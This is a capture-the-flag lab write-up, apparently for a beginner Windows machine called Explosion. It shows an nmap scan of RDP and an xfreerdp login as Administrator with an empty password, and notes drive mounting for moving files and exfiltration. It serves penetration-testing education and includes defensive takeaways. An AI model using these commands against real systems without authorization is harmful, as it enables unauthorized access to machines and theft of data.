— RD112

⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Explosion introduces RDP (Remote Desktop Protocol) — Microsoft's graphical remote access protocol. In this machine, the Administrator account has no password set, allowing direct GUI access to a Windows desktop. RDP with weak or empty credentials is one of the highest-impact findings in external penetration tests.

Tools: nmap · xfreerdp · Difficulty: Very Easy · OS: Windows

01 — What You Will Learn

Skill	Why it matters
Identifying RDP with Nmap	Port 3389 on Windows is always worth probing — many orgs expose it directly to the internet
xfreerdp from Linux	The standard RDP client on Kali/Parrot for connecting to Windows targets
Empty-password Administrator	A surprisingly common finding — default installs sometimes ship with no admin password
GUI post-exploitation	RDP gives an interactive desktop — useful for running tools, exfiltrating data, and pivoting

02 — Reconnaissance

Nmap scan

nmap -sV -sC -p- --min-rate 5000 10.129.x.x

Relevant output

PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Windows 10 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-enum-encryption: | Security layer: RDP Security Layer |_ RDP Protocol Version: RDP 5.x, 6.x, 7.x, 8.x, 10.x

What you're seeing: port 3389 is open — the standard RDP port. The rdp-enum-encryption Nmap script confirms it's a genuine Microsoft Terminal Services endpoint, not a honeypot or non-standard service.

⚠ RDP exposed on the internet is a primary ransomware entry point. Threat actors actively scan for 3389 and use credential stuffing, brute force, and stolen credentials to gain initial access.

03 — Exploitation

Connect using xfreerdp. Attempt the Administrator account with an empty password.

Connect with xfreerdp

xfreerdp /u:Administrator /p:"" /v:10.129.x.x

A Windows desktop opens. You now have full GUI access to the machine as Administrator.

xfreerdp flag reference

Flag	Meaning
/u:<user>	Username to authenticate with
/p:<pass>	Password (use "" for empty)
/v:<host>	Target IP or hostname
/d:<domain>	Domain name for domain accounts
/cert:ignore	Skip certificate verification (common on internal targets)
/dynamic-resolution	Allow window resizing
/drive:kali,/tmp	Mount a local folder inside the RDP session

ℹ If you get a certificate warning, add /cert:ignore to the command. In real engagements, self-signed RDP certificates are the norm on internal hosts.

04 — Finding the Flag

Once connected, open File Explorer or a Command Prompt and navigate to the Administrator's desktop.

Via Command Prompt in the RDP session

type C:\Users\Administrator\Desktop\flag.txt

✓ Submit the flag string to complete the machine.

05 — Key Takeaways

RDP with no password is an instant critical. It's a full graphical shell as an administrator — equivalent to sitting physically in front of the machine.

Concept	Real-world relevance
Empty admin password	Default Windows installs in some environments ship without a set admin password — always try empty before brute-forcing
RDP = full GUI access	Unlike a shell, RDP lets you interact with the entire desktop, run GUI tools, and access browser sessions
Port 3389 on the internet	External RDP is in the top-5 initial access vectors for ransomware — always flag it as critical
Drive mounting in xfreerdp	The /drive flag lets you transfer files in and out of the session without SMB or FTP